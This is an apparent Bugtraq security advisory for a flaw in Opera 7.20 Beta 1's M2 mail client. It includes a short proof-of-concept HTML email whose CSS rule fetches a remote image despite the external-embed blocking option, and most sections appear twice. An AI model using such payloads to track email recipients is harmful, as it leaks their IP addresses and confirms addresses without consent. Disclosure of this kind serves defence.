Opera M2 Mail Client Policy Circumvention Vulnerability
BID:8254
Info
Opera M2 Mail Client Policy Circumvention Vulnerability
| Bugtraq ID: | 8254 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 23 2003 12:00AM |
| Updated: | Jul 23 2003 12:00AM |
| Credit: | Discovery is credited to Arve Bersvendsen <[email protected]>. |
| Vulnerable: |
Opera Software Opera Web Browser 7.20 Beta 1 build 2981 |
| Not Vulnerable: | |
Discussion
Opera M2 Mail Client Policy Circumvention Vulnerability
The Opera M2 Mail Client is vulnerable to a policy circumvention issue that could allow information to be disclosed to a remote attacker. It is possible for an attacker to bypass the option to suppress the viewing of external embeds. This could allow the attacker to learn the IP address of a vulnerable user and to determine if an e-mail address is valid.
This vulnerability was reported to only affect Opera 7.20 Beta 1 build 2981.
The Opera M2 Mail Client is vulnerable to a policy circumvention issue that could allow information to be disclosed to a remote attacker. It is possible for an attacker to bypass the option to suppress the viewing of external embeds. This could allow the attacker to learn the IP address of a vulnerable user and to determine if an e-mail address is valid.
This vulnerability was reported to only affect Opera 7.20 Beta 1 build 2981.
Exploit / POC
Opera M2 Mail Client Policy Circumvention Vulnerability
The following proof of concept was made available:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<style type="text/css">
omf|headers { background-image: url(http://www.example.com/t.png) }
</style>
</head>
<body>
{ Normal mail body here }
</body>
</html>
The following proof of concept was made available:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<style type="text/css">
omf|headers { background-image: url(http://www.example.com/t.png) }
</style>
</head>
<body>
{ Normal mail body here }
</body>
</html>
Solution / Fix
Opera M2 Mail Client Policy Circumvention Vulnerability
Solution:
This vulnerability has reportedly been fixed in Opera 7.20 Beta 2 build 3014, however, this has not been confirmed by Symantec.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
This vulnerability has reportedly been fixed in Opera 7.20 Beta 2 build 3014, however, this has not been confirmed by Symantec.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Opera M2 Mail Client Policy Circumvention Vulnerability
References:
References:
- Opera Web Browser Home Page (Opera Software)
- Vulnerability in the mail client in Opera 7.20 beta 1. (Arve Bersvendsen
)